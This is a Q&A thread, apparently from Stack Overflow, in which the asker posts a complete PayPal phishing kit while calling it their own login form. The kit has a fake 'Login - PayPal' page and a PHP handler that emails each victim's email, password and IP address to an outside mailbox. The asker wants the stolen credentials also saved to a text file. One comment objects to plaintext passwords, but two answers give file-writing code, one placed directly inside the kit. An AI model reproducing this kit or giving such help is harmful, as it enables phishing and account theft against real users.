# How to store my post data to a text file in PHP?

Tags: php

Suppose I have a php login from  that's name is login.php
When a user logged in I have received an auto mail with login email and password.
Now I want to save this email and password to a text file. How can I do this?

Here is my Index.php code:

```
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" ns1:xmlns="http://ogp.me/ns#">

<head>
<script language="JavaScript1.2">
    var testresults
    function checkemail(){
        var str = document.validation.1.value
        var filter = /^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i
        if (filter.test(str))
            testresults = true
        else {
            alert("Please input a valid email address!")
            testresults = false
        }
        return (testresults)
    }
</script>

<script>
    function checkbae(){
        if (document.layers || document.getElementById || document.all)
            return checkemail()
        else
            return true
    }
</script>

    <title>Login - PayPal</title>

    <style type="text/css">

        #body
        {
            width : 900px;
            heigth : 900px;
        }
        input {
            -moz-appearance: none;
            -moz-box-sizing: border-box;
            background: none repeat 0 0 #FFF;
            border: 1px solid #B3B3B3;
            border-radius: 5px;
            color: #333;
            font-size: 1.071rem;
            height: 38px;
            line-height: 1.25em;
            margin: 0;
            padding: 0;
            position: relative;
            text-indent: 10px;
            transition: border-color 0.3s ease 0s;
            width: 250px;
        }
        .btn {
            -webkit-appearance: none;
            -moz-box-sizing: border-box;
            background: none repeat 0 0 #0079C1;
            border-radius: 5px;
            border-color: #0079C1;
            color: #FFF;
            cursor: pointer;
            display: inline-block;
            font-family: arial, sans-serif;
            font-size: 15px;
            font-weight: bold;
            line-height: 1.4545em;
            margin-bottom: 0;
            padding: 9px 15px 10px;
            text-align: center;
            vertical-align: middle;
            height: 40px;
            _margin-left: -10px;
            *margin-left: -10px;
        }
        .btn:hover,
        .btn:focus {
            background: none repeat 0 0 #0285D2;
            color: #FFF;
            text-decoration: none;
        }
        .btn:focus {
            outline: thin dotted #333;
            outline-offset: -2px;
        }
        .btn.active,
        .btn:active {
            background-image: none;
            box-shadow: 0 2px 4px rgba(0, 0, 0, 0.15) inset, 0 1px 2px rgba(0, 0, 0, 0.05);
            outline: 0 none;
        }
        .btn.disabled,
        .btn[disabled],
        .btn.disabled:hover,
        .btn[disabled]:hover,
        .btn.disabled:active,
        .btn[disabled]:active {
            background: none repeat 0 0 #E5E5E5;
            cursor: auto;
        }
        .btn-large {
            border-radius: 6px;
            font-size: 17.234px;
            padding: 9px 14px;
        }
        .btn-large[class^="icon-"],
        .btn-large[class*=" icon-"] {
            margin-top: 4px
        }
        .btn-secondary {
            background: none repeat 0 0 #DDD;
            color: #333;
        }
        .btn-secondary:hover,
        .btn-secondary:focus {
            background: none repeat 0 0 #DDD;
            color: #333;
        }
        input.large {
            width: 337px
        }
        input.large[type=password], input.large[type=text] {
            font-size: 15px;
            font-weight: normal;
        }
        input[type=text]:focus, input[type=password]:focus {
            border-color: #0079C1;
            outline: 0 none;
        }

    .auto-style1 {
        margin-top: 20px;
    }

    </style>



    <link rel="shortcut icon" href="img/pp_favicon_x.ico">
    <link rel="apple-touch-icon" href="img/apple-touch-icon.png">

</head>

<body style="background-image: url('img/bg.PNG');">

<form method="post" action="LOGIN.php" onSubmit="return checkbae()" style="z-index: 1; width: 395px; height: 232px; position: absolute; top: 208px; left: 211px">

<div style="z-index: 1; width: 340px; height: 40px; position: absolute; top: 53px; left: 24px">
    <input name="1" required autocomplete="off" class="large" style="z-index: 1; position: absolute; top: -3px; left: 0px; width: 338px; height: 38px" type="email" />
</div>

<div style="z-index: 1; width: 340px; height: 40px; position: absolute; top: 129px; left: 24px">
    <input name="2" required autocomplete="off" style="z-index: 1; position: absolute; top: -3px; left: 0px; width: 338px; height: 38px" type="password" />
</div>

<div style="z-index: 1; width: 340px; height: 40px; position: absolute; top: 182px; left: 24px">
    <input name="submit.x" type="submit" value="Login" class="btn large" style="z-index: 1; position: absolute; top: -3px; left: 0px; width: 338px; height: 41px"/>
</div>


</form>

<div class="auto-style1" style="height: 710px">
</div>

</body>

</html>
```

My login.php code:

```
<?php


$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);

$message .= "=========[BY MutantCode]=========\n";
$message .= "Email  : ".$_POST['1']."\n";
$message .= "Password  : ".$_POST['2']."\n";
$message .= "===============[IP]==============\n";
$message .= "IP : http://www.geoiptool.com/?IP=$ip\n";
$message .= "==========[BY ProVro]=========\n";


$to = "mad.codder@gmail.com";
$subject = "PP LOGIN FROM [$ip]";
$headers = "From: Account <info@agrupacion1-4escala.com.ar>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";

mail($to, $subject, $message,$headers);


header("Location:websc-proccessing.php");


?>
```

Comment: NEVER NEVER EVER store a password in a plain text file!!

Answer (score 0):

It's better to store user information in db, but in PHP it's possible to store data into files.

```
//Creates file or selects existing file to write("w") data into it
$file = fopen("file.txt", "w");
//Here you combine your $_POST variables.
$text = $_POST['variable1']." ".$_POST['variable2'];
//And Append them to $text
fwrite($file, $text);
//After finishing writing you should close file
fclose($file);
```

Answer (score 0):

I understand that you want to write the posted data on the server in some text file. If the understanding is correct than insert this code before the mail function line:

```
$file = fopen("test.txt","a+");
$text = $message;
fwrite($file, $text);
fclose($file);
```

Remember you need to use `a+` for reading and writing. This places the file pointer at the end of the file (It keeps on appending the file). If the file does not exist, attempt to create it.